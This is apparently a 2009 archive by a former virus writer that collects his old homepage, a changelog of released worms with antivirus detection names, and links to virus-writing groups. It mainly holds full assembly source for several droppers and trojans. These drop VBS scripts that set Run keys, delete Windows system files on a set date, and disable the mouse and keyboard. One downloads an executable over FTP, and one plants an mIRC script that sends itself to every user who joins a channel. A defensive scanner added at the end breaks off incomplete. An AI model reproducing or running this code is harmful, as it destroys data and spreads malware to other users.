PetiKArchiver
1.0
17/05/2009
Seven years after I stopped coding viruses and worms, I decided to assemble all my works.
They are sorted by date like this : YYYYMMDD (where Y is the year, M the month and D the day) followed by
the name of the work.
At the beginning you can see my old website page, then my works. Next, my unfinished works and
some articles.
Happy reading.
PetiK Homepage
(last update : July 9th 2002)
EMAIL : petikvx@aol.com
2002:
July 9th :
GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE YOU LIKE MY WORKS AND THAT THEY WILL
HELP YOU IN YOUR VX-LIFE.
IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK.
Special Thanx to : alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98 and the greatest
coder group : 29A
July 7th : Add some new descriptions of AV (from Trend Micro and McAfee)
July 3rd : Add the binary of my last Worm coded with alc0paul : VB.Brigada.Worm
July 2nd : Add a new link : Second Part To Hell
June 29th : Add my new tool : PetiK’s VBS Hex Convert and add my last full spread VBS worm : VBS.Hatred
June 26th : Add W32/HTML.Dilan
June 24th : Add VBS.Park
June 22nd : I finish my new worm : VB.DocTor.Worm
June 20th : PETIKVX EZINE #2 RELEASED : DOWNLOAD IT and add a new tool : CryptoText and my last worm :
VB.Mars.Worm
June 19th : Add VBS.Cachemire. Add my new article VBS/HTML Multi-Infection.
June 16th : I join a new Virus Group : Brigada Ocho (create by alc0paul)
June 1st : Add VB.Lili.Worm. My new worm is released : I-Worm.Haram
May 31st : I leave the rRlf group
May 23rd : New Ezine : rRlf#2
May 19th : I removed some sources. You can find some of them in PetiKVX#1 and the others in PetiKVX#2. Finished
VB.Visual.Worm, published in PetiKVX #2
May 14th : Add W97M.ApiWord
May 12th : Add W32.HLLW.Archiver
May 10th : Add a new tool to protect against new VBS worms : PPVBSW
May 9th : Add a new macro virus : W97M.AutoSpread
May 8th : I join the rRlf group (http://www.rrlf.de). Add HTML.Welcome.
May 6th : Add a new article : VBS Tutorial, also available in PDF
April 27th : Add VBS.Xchange
April 21st : Add all sources of my works.
April 7th : Add my first Ezine : PetiKVX Ezine #1. My new email is Petikvx@aol.com
March 15th : Add I-Worm.Together
March 14th : My new email : petikvx@lycos.fr (petikvx@multimania.com failed)
March 10th : Add W32.HLLW.LiteLo
March 9th : Add my articles in PDF format : articlesPDF and 29A#6.
March 8th : Add my first VBS worm and HTML virus generator : PSWVG (W32.PSVG.gen : Norton AntiVirus,
Constructor.VBS.PSWVG.10 : AVP)
March 3rd : Add a new virus/worm : VBS/W97M.Doublet
February 25th : Add a macro virus : W97M.Wolf
February 24th : Add a lame love worm : HTML.Linda
February 22nd : Add W32.HLLW.Wargames
February 18th : Add a new Ezine : rRlf
February 16th : Add my first virus (perhaps bug) : WinRAR.Linda
February 14th : Add a new HTML virus : HTML.Macrophage
February 10th : My last worm can now be downloaded. Add my second article : Technics
February 7th : Finish my last worm : I-Worm.Falken (cannot be downloaded immediately)
February 4th : Add new worm : I-Worm.Extract
February 1st : New Worm : W32/W97M.Twin
January 27th : I come back with a new worm : HLLW.SingLung.Worm
January 20th : Add PetiKShow. This program contains all the sources of my works.
January 10th : Add an old article about Worm Spreading, written by me on September 19th.
January 1st : HAPPY NEW YEAR. I DECIDED TO STOP CODING VIRII AND WORMS. GOOD BYE
2001:
December 10th : Add my last worm : W32.HLLW.Last
November 6th : I-Worm.Anthrax
October 12th : I-Worm.WTC
September 8th : I-Worm.Passion
September 2nd : I-Worm.Rush
August 24th : I-Worm.Casper
August 18th : Add the tool tElock 5.1 (a PE file compressor/encryptor)
August 16th : I-Worm.Kevlar
August 12th : New design. You can hear one of my compositions.
August 9th : New description from AVP about I-Worm.MadCow and I-Worm.Friends.
August 8th : I-Worm.XFW
July 18th : New family : W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton Antivirus
July 8th : I-Worm.MaLoTeYa
July 3rd : VBS.Delirious
June 30th : I-Worm.Bush
June 19th : I-Worm.Winmine
June 18th : W97M.Blood
June 17th : VBS.Seven
June 10th : VBS.Starmania, I-Worm.Gamma, W97M.Kodak
June 4th : BAT.Quatuor
June 3rd : Bastille, JS.Germinal
June 2nd : Add some Worms : HTML.Embargo, I-Worm.Mustard
May 25th : I start my homepage.
Source
Here you can find the different worms that I created :
(AntiVirus Name column : TM=Trend Micro)

Real Name : HTML.Embargo
Date : 05/29/2001
AntiVirus Name : VBS.Embaro.A.Intd
Description : It copies itself to \WINDOWS\WinHelp.htm. Changes AUTOEXEC.BAT. It uses mIRC channels to spread.

Real Name : I-Worm.Bush
Date : 06/30/2001
AntiVirus Name : W95.Pet_Tick.E@mm ; AVP : I-Worm.PetiK.e
Description : Uses MAPI to spread. No bugs.

Real Name : I-Worm.Extract
Date : 02/04/2002
AntiVirus Name : Panda : W32/Extract ; TM : WORM.PETIK.L
Description : Opens KERNEL32.DLL to find the APIs.

Real Name : I-Worm.Friends
Date : 05/05/2001
AntiVirus Name : W32.Pet_Tick.B ; W32.Fiend.Worm ; AVP : I-Worm.PetiK.b
Description : It uses a VBS file and mIRC to spread. It alters the Windows owner and company.

Real Name : I-Worm.Gamma
Date : 05/09/2001
AntiVirus Name : W95.Pet_Tick.D@mm ; W95.Wormfix.Worm@mm ; AVP : I-Worm.PetiK.c ; W32.Pet_Tick.Intd ; TM : Worm.PetiK.K
Description : Scans all *.*htm* files in "Temporary Internet Files" and uses MAPI functions to spread.

Real Name : I-Worm.MaLoTeYa
Date : 07/08/2001
AntiVirus Name : W32.Pet_Tick.G ; W32.Malot.Int ; AVP : I-Worm.PetiK.f ; TM : Worm.Malot.A
Description : Uses MAPI to spread. Creates an HTML file in the StartUp folder to send some information about the user. CONTRIBUTED TO 29A#6.

Real Name : I-Worm.PetiK
Date : 02/07/2001
AntiVirus Name : W95.Pet_Tick.C@mm ; W95.Buggy.Worm@mm ; AVP : I-Worm.IEPatch ; TM : Worm.PetiK.A
Description : Modifies the wallpaper with a BMP file that it downloads from an FTP site. It spreads with a VBS file which uses Outlook.

Real Name : I-Worm.Winmine
Date : 06/19/2001
AntiVirus Name : W32.Mineup.Worm ; AVP : I-Worm.Petik ; McAfee : W32/PetTick@MM ; Panda : W32/PetTick
Description : Uses Outlook to spread.

Real Name : I-Worm.XFW
Date : 08/08/2001
AntiVirus Name : W95.Pet_tick.gen ; TM : Trojan.PetiK.XFW ; Panda : Worm.PetiK.D
Description : Infects WSOCK32.DLL and all DLL files in the SYSTEM directory.

Real Name : VB.Lili.Worm
Date : 06/01/2002
AntiVirus Name : W32/W97M.Dotor.Worm ; W32.Pet_Ticky.B ; Panda : W32/Petlil.A
Description : A lame worm with an XXX picture.

Real Name : VBS.Delirious
Date : 07/03/2001
AntiVirus Name : VBS.Pet_Tick.C@m ; VBS.Ketip.C@m ; AVP : I-Worm.Petik.h
Description : Puts its code in NORMAL.DOT.

Real Name : VBS.Seven
Date : 06/18/2001
AntiVirus Name : VBS.Chism@mm ; VBS.Copy.A@mm ; AVP : I-Worm.Petik.i ; TM : VBS.PETIK.I
Description : Many actions on any day.

Real Name : W32.HLLW.Wargames
Date : 02/22/2002
AntiVirus Name : AVP : I-Worm.WarGam ; Viruslist : WarGame ; W32.WarGam.Worm
Description : Different ways of propagation : open *htm files, old mail read and Outlook Address.

Real Name : W97M.Blood
Date : 06/18/2001
AntiVirus Name : W97M.Pet_Tick.Intd ; W97M.Ketip.Intd ; AVP : Embedded
Description : Infects NORMAL.DOT.

Real Name : W97M.Kodak
Date : 06/10/2001
AntiVirus Name : W97M.Adok.A ; AVP : Macro.Word97.Adok
Description : Infects NORMAL.DOT.

Real Name : W97M.Maya
Date : 06/05/2001
AntiVirus Name : W97M.OutlookWorm.Gen ; AVP : Macro.Office.Melissa-based ; TM : W97M.AYAM.A
Description : It uses mIRC and Outlook to spread.
Links
VIRUS CODERS :
Alc0paul : http://alcopaul.cjb.net
Belial : http://home.foni.net/~belial
Benny : http://www.coderz.net/benny
Black Jack : http://blackjackvx.cjb.net
Del_Armg0 : http://www.delly.fr.st French coder
FlyShadow : http://flyshadow.cjb.net
Gigabyte : http://www.coderz.net/gigabyte
Immortal Riot : http://www.immortalriot.cjb.net
Kalanar : http://virii.at/ak or http://www.kvirii.com.ar
Lord Julus : http://lordjulus.cjb.net
NBK : http://www.nbk.hpg.ig.com.br
Nucleii : http://www.coderz.net/nucleii/main.html
Pointbat : http://pbat.cjb.net/ French coder
Silvio : http://www.big.net.au/~silvio/
Ratter : http://www.coderz.net/ratter/
SPTH (Second Part To Hell) : http://www.spth.de.vu/
The Walrus : http://walrus.up.to
Tipiax : http://www.multimania.com/tipiax French coder
Vecna : http://www.coderz.net/asm_infamy
VirusBuster : http://vtc.cjb.net
Voven/SMF : http://vovan-smf.wz.cz/
VXUniverse : http://vxuniverse.cjb.net
ZeMacroKiller98 : http://www.crosswinds.net/~zemacrokiller98/index.htm French coder
Zulu : http://www.coderz.net/zulu
VX GROUPS :
29A : http://29a.host.sk
ASM : http://kickme.to/asm
BlackArt : http://blackart.cjb.net
Black Cat virii Group : http://www.ebcvg.com or http://bcvgvx.cjb.net/
Brigada Ocho : http://brigada8.cjb.net
HFX : http://www.hfactorx.org/
Indonesian Virus : http://indovirus.8m.com/
Kryptocrew : http://www.kryptocrew.de
LineZero : http://www.coderz.net/lz0vx/start.htm
MATRiX : http://www.coderz.net/mtxvx
NoMercy : http://www.coderz.net/nomercy/
Pinoy Virus Writer : http://hackers.b3.nu
rRlf : http://www.rrlf.de/
ShadowVX : http://shadowvx.members.easyspace.com/
SMF : http://www.sallyone.com/smf/e_index.htm , http://smfgroup.cjb.net
Ultimate Chaos : http://www.ultimatechaos.co.uk/
Virus Brasil : http://www.virusbrasil.8m.com
OTHER SITES :
Coderz : http://www.coderz.net
Red Virica : http://redvirica.host.sk/
Virii Argentino : http://www.virii.com.ar
Virus Central : http://www.viruscentral.org/
VirusList : http://www.viruslist.com
Virus Trading Center : http://www.oninet.es/usuarios/darknode/
VX-DNET : http://surf.to/vxdnet
VX Heavens : http://vx.netlux.org/
Virus Trading : http://www.virustrading.com/
VX Universe : http://vxuniverse.cjb.net/
ExeTools : http://www.exetools.com
ProTools : http://protools.cjb.net
ANTIVIRUS SITES :
AVP : http://www.avp.ch
Symantec : http://www.symantec.com/avcenter
Trend Micro : http://www.trendmicro.com
CONTACT : GuestBook
© 2001-2002 PetiK. All information on this site is for educational purposes only.
;SIZE : 475 BYTES 31/08/00
;DWARF creates a file dwarf.vbs which adds a registry key so
;that the computer shuts down at startup
.model small
.code
org 100h
end DEBUT
;By M.Xxxxxxx XXXXXXX (c)2000 09/09/00
;SIZE : 689 BYTES
;FIRST TESTED AT THE LYCEE KIRSCHLEGER IN MUNSTER
;DWARF259 CREATES TWO PROGRAMS :
; -Dwarf.vbs in C:, which launches Evil.com at every startup
; -Evil.com in C:\WINDOWS.
;On 25 September, it renames REGEDIT.EXE into the recycle bin
;as DWARF.AZE and deletes AUTOEXEC.BAT and WIN.INI
.model small
.code
org 100h
WININI db 'C:\WINDOWS\Win.ini',0
AUTOEXEC db 'C:\autoexec.bat',0
REG db 'C:\WINDOWS\Regedit.exe',0
CORBEILLE db 'C:\RECYCLED\dwarf.aze',0
progl2 equ $-VERIFICATION
NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Evil.com',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"'
progl1 equ $-prog1
end TOUT_DEBUT
;By M.Xxxxxxx XXXXXXX (c)2000 12/09/00
;SIZE : 1282 BYTES
;DWARF7 CREATES TWO PROGRAMS : Dwarf.vbs and Panda.vbs. DWARF.VBS
;ADDS A KEY TO RUN PANDA.VBS EVERY DAY. PANDA.VBS
;ONLY ACTS ON 5 DECEMBER. IT ADDS A KEY TO SHUT DOWN
;THE COMPUTER AT STARTUP AND CREATES A FILE AUTOEXE.BAT WHICH
;WILL DELETE FILES ON THE COMPUTER.
.model small
.code
org 100h
FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;create the first file
xchg ax,bx
mov ah,40h
mov cx,progl1
mov dx,offset prog1
int 21h ;write
mov ah,3Eh
int 21h ;close
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;create the second file
xchg ax,bx
mov ah,40h
mov cx,progl2
mov dx,offset prog2
int 21h ;write
mov ah,3Eh
int 21h ;close
MESSAGE: mov ax,3
int 10h
mov ah,9
lea dx,msg
int 21h
FIN: mov ah,4Ch
int 21h
NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.vbs',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"'
progl1 equ $-prog1
prog2 db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah
db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah
db 'Dim W',0DH,0Ah
db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah
db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah
db 'file="C:\autoexe.bat"',0DH,0Ah
db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah
db 'O.Writeline "@echo off"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah
db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah
db 'End If',0DH,0Ah
progl2 equ $-prog2
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\Dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end FILE1
;Panda3.asm by PandaKiller 03/10/00
;TASM32 /M /ML panda3
;TLINK32 -Tpe -x -aa panda3,,,import32
.386
locals
jumps
.model flat
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn MessageBoxA:PROC
extrn WinExec:PROC
extrn ExitProcess:PROC
.data
octets dd ?
flz_handle dd ?
nom_fichier db 'C:\Salut.vbs',00h
prog db 'C:\Salut.vbs',00h
TEXTE db 'Salut ! Ca va ?',00h
TITRE db 'Hello',00h
TEXTE2 db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah
db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah
db 'Ouvre-le vite',00h
TITRE2 db 'FICHIER CREE',00h
CLE db '\Software\Microsoft\Windows\CurrentVersion',00h
DONNEE db 'PandaKiller',00h
NOM db 'RegisteredOwner',00h
p dd 0
l dd 0
DEBUTV:
db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah
db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah
db '',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set win = a.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah
db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah
db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah
db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah
db 'INTERNET()',0dh,0ah
db 'BUG2001()',0dh,0ah
db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah
db 'Sub INTERNET()',0dh,0ah
db 'Dim W',0dh,0ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page", "http://www.penthouse.com"',0dh,0ah
db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah
db 'Sub BUG2001()',0dh,0ah
db 'If Year(Now) = 2001 Then',0dh,0ah
db ' Dim P',0dh,0ah
db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop1", "rundll32,mouse disable"',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop2", "rundll32,keyboard disable"',0dh,0ah
db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
taille equ $-DEBUTV
.code
REGISTRE: push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;in RegisteredOwner
push p
call RegSetValueExA ;CREATE A REGISTRY VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
FICHIER: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset nom_fichier ;GIVE THE FILE NAME
call CreateFileA
mov [flz_handle],eax
push 00000000h
push offset octets
push offset taille
push offset DEBUTV
push [flz_handle]
call WriteFile
push [flz_handle]
call CloseHandle
MESSAGE: push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
push 40h
push offset TITRE2
push offset TEXTE2
push 0
call MessageBoxA
push 1
push offset prog
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File Panda3.exe received on 05.16.2009 18:00:23 (CET)
Additional information
File size: 8192 bytes
MD5...: 104229b6d583df50db044f0d89fc7db9
SHA1..: db05dc880b74d864a8c47d8db22c2847b655c14a
comment $
DESCRIPTION:
TO COMPILE:
Link : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
.386p
locals
jumps
.model flat
extrn CreateDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitProcess:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
targ10 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
rep1 db "C:\PandaKiller",00h
rep2 db "\Panda",00h
copie1 db "\PandaKiller.exe",00h
copie2 db "\Monopoly.exe",00h
copie3 db "\Panda\Stages.exe",00h
fichier db "\PandaKiller\EMail.txt",00h
TXT db "[PandaKiller]",0dh,0ah
db "Pour tout contact : Panda34@caramail.com",0dh,0ah
db "VBS/LoveLetter.A",0dh,0ah
db "VBS/IE55",0dh,0ah
db "W32.Happy99",0dh,0ah
db "I-Worm/Kak.A",0dh,0ah
db "W32.PandaKiller.A par PandaKiller (c)2000",00h
taille equ $-TXT
.code
DEBUT:
CREER_REPERTOIRE:
push 00000000h
push offset rep1
call CreateDirectoryA ;C:\Pandakiller
push 260
push offset targ1
call GetWindowsDirectoryA
push offset rep2
push offset targ1
call lstrcat
push offset targ1
call CreateDirectoryA ;%windir%\Panda
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\PandaKiller.exe
push 260
push offset targ1
call GetSystemDirectoryA
push offset copie2
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%system%\Monopoly.exe
push 260
push offset targ10
call GetWindowsDirectoryA
push offset copie3
push offset targ10
call lstrcat
push 00000000h
push offset targ10
push offset targ1
call CopyFileA ;%windir%\Panda\Stages.exe
FICHIER_TEXTE:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset fichier
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push taille
push offset TXT
push [fh]
call WriteFile
push [fh]
call CloseHandle
REGISTRE:
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;in RegisteredOwner
push p
call RegSetValueExA ;CREATE A REGISTRY VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
MESSAGE:
push 35h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
cmp eax,4
jne FIN
end DEBUT
File W32PKa.exe received on 05.16.2009 10:40:20 (CET)
Additional information
File size: 8192 bytes
MD5...: 711f77c3a07ea085bee6c1bfa884f012
SHA1..: 3cd6512c587c3b0292264177f3d538aa6e9c6965
comment $
DESCRIPTION:
This program changes the registered owner name to PandaKiller. It copies itself
into %windir% (the WINDOWS folder) and changes the Internet start page.
It then creates three files :
- FTP.DRV : this file connects over FTP and downloads a program,
  KILL_CIH.EXE (a program against CIH)
- FTP.BAT : it runs FTP.DRV
- MIRC.EKP : a script for mIRC that lets the file propagate itself.
  On connect, it launches FTP.BAT and copies WINEXEC.EXE to
  PICTURE.EXE. When someone joins, it sends them PICTURE.EXE
  *worm* : it also sends PICTURE.EXE
  *KKK* : disconnects
  *White Power* : closes the program
  *hitler* : deletes Regedit.exe
TO COMPILE:
Link : www.coderz.net/matrix
www.matrixvx.org
www.coderz.net
$
.386p
locals
jumps
.model flat
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn WinExec:PROC
extrn CreateDirectoryA:PROC
extrn ExitProcess:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
fh dd 0
octets dd 0
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
DONNEE2 db "http://kadosh.multimania.com",00h
NOM2 db "Start Page",00h
CLE3 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE3 db "C:\Win\kill_cih.exe",00h
NOM3 db "killcih",00h
copie1 db "\WinExec.exe",00h
dossier db "C:\Win",00h
bat db "C:\Win\ftp.bat",00h
drv db "C:\Win\ftp.drv",00h
ini db "C:\Win\mirc.ekp",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
drvd db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "cd Panda",0dh,0ah
db "binary",0dh,0ah
db "lcd C:\Win",0dh,0ah
db "get kill_cih.exe",0dh,0ah
db "bye",0dh,0ah
db "exit",0dh,0ah
drvsize equ $-drvd
inid db "[SCRIPT]",0dh,0ah
db "n1=on 1:start:{",0dh,0ah
db "n2=.remote on",0dh,0ah
db "n3=.ctcps on",0dh,0ah
db "n4=.events on",0dh,0ah
db "n5=}",0dh,0ah
db "n6=on 1:connect:{",0dh,0ah
db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah
db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah
db "n9=on 1:join:#:{",0dh,0ah
db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n11=}",0dh,0ah
db "n12=on 1:text:*worm*:{",0dh,0ah
db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah
db "n14=}",0dh,0ah
db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah
db "n16=on 1:text:*white power*:/exit",0dh,0ah
db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah
inisize equ $-inid
.code
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;in RegisteredOwner
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie1
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe
CREER_DOSSIER:
push 00000000h
push offset dossier
call CreateDirectoryA ;C:\Win
REGISTRE2:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000001h ;HKEY_CURRENT_USER
call RegCreateKeyExA
push 05h
push offset DONNEE2 ;kadosh.multimania.com
push 01h
push 0
push offset NOM2 ;Start Page
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE3
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE3 ;C:\Win\kill_cih.exe
push 01h
push 0
push offset NOM3 ;killcih
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
FICHIER:
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset bat
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push batsize
push offset batd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset drv
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push drvsize
push offset drvd
push [fh]
call WriteFile
push [fh]
call CloseHandle
push 00000000h
push 00000080h
push 00000002h
push 00000000h
push 00000001h
push 40000000h
push offset ini
call CreateFileA
mov [fh],eax
push 00h
push offset octets
push inisize
push offset inid
push [fh]
call WriteFile
push [fh]
call CloseHandle
COPIE_MIRC:
push 00000000h
push offset script1
push offset ini
call CopyFileA
push 00000000h
push offset script2
push offset ini
call CopyFileA
push 00000000h
push offset script3
push offset ini
call CopyFileA
push 00000000h
push offset script4
push offset ini
call CopyFileA
WinExecBat:
push 1
push offset bat
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File W32PKb.exe received on 05.16.2009 10:41:58 (CET)
Additional information
File size: 8192 bytes
MD5...: 58c6c31028ac1b84cc73eb13300f21da
SHA1..: a73cf795bc76385b71158a64cc770a813b399b74
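The W32PKb description above explains how its MIRC.EKP works: once copied over mIRC's script.ini, an "on join" handler DCC-sends the dropped executable to every user who enters a channel, and "on text" handlers delete files or disconnect on trigger words. The later T.PK and MadCow listings in this archive drop the same kind of script. As an added example for defenders, not part of PetiK's archive or any of the sources above, the Python scanner below parses an mIRC-style script.ini, re-joins the "nN=" lines into event handlers and reports those that send files or touch the local disk. The script.ini it scans is constructed for the test, modelled on the behaviour the description lists, and is not a real dropped file; the set of commands it flags is my own choice.

```python
"""Flag self-propagating or destructive handlers in an mIRC script.ini.

Added example (not PetiK's code). mIRC stores each script line as
"nN=<text>" under a [script] section; an "on <level>:<event>:" line opens
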